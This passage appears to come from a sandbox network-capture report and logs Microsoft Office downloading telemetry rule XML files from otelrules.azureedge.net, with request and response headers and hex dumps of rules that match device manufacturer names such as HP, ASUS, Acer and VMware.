                                                                                                                      2024-12-03 07:54:56 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      25192.168.2.44978213.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:55 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:56 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:55 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 471
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                      ETag: "0x8DC582BB10C598B"
                                                                                                                      x-ms-request-id: 724e5c80-801e-007b-4caf-42e7ab000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075455Z-174f7845968kvnqxhC1EWRmf3g0000000sag00000000bd74
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:54:56 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      26192.168.2.44977713.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:57 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:57 UTC494INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:57 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 2160
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                      ETag: "0x8DC582BA3B95D81"
                                                                                                                      x-ms-request-id: d2130280-a01e-006f-03c7-4313cd000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075457Z-174f7845968cdxdrhC1EWRg0en00000015fg00000000b49d
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:54:57 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      27192.168.2.44978413.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:57 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:58 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:57 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 467
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                      ETag: "0x8DC582BA6C038BC"
                                                                                                                      x-ms-request-id: 8361aa46-901e-008f-73ef-4467a6000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075457Z-174f7845968glpgnhC1EWR7uec00000015wg000000000uqt
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:54:58 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      28192.168.2.44978513.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:57 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:58 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:58 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 407
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                      ETag: "0x8DC582BBAD04B7B"
                                                                                                                      x-ms-request-id: e2bedc78-c01e-0066-2f35-40a1ec000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075458Z-174f7845968nxc96hC1EWRspw800000015dg000000003cvq
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:54:58 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      29192.168.2.44978613.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:57 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:58 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:58 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 486
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                      ETag: "0x8DC582BB344914B"
                                                                                                                      x-ms-request-id: 54795c3a-901e-0064-35fd-44e8a6000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075458Z-174f78459688l8rvhC1EWRtzr00000000ka0000000001kf3
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:54:58 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      30192.168.2.44978713.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:57 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:58 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:58 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 427
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                      ETag: "0x8DC582BA310DA18"
                                                                                                                      x-ms-request-id: 5d2ee098-d01e-0066-70f7-44ea17000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075458Z-174f7845968xlwnmhC1EWR0sv800000015e00000000066dc
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:54:58 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      31192.168.2.44978813.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:59 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:00 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:00 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 486
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                      ETag: "0x8DC582B9018290B"
                                                                                                                      x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075500Z-174f78459688l8rvhC1EWRtzr00000000k50000000009zwc
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:00 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      32192.168.2.44978913.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:59 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:00 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:00 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 407
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                      ETag: "0x8DC582B9698189B"
                                                                                                                      x-ms-request-id: 72388ca2-901e-0029-4711-41274a000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075500Z-174f7845968n2hr8hC1EWR9cag00000015ag000000002x6e
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:00 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      33192.168.2.44979013.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:00 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:00 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:00 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 469
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                      ETag: "0x8DC582BBA701121"
                                                                                                                      x-ms-request-id: 417b6c53-401e-0029-0d91-3f9b43000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075500Z-174f7845968frfdmhC1EWRxxbw00000015tg000000000s97
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:00 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      34192.168.2.44979113.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:00 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:00 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:00 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 415
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                      ETag: "0x8DC582BA41997E3"
                                                                                                                      x-ms-request-id: 6ab56c84-d01e-008e-48c7-43387a000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075500Z-174f78459688l8rvhC1EWRtzr00000000k4g00000000a951
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:00 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
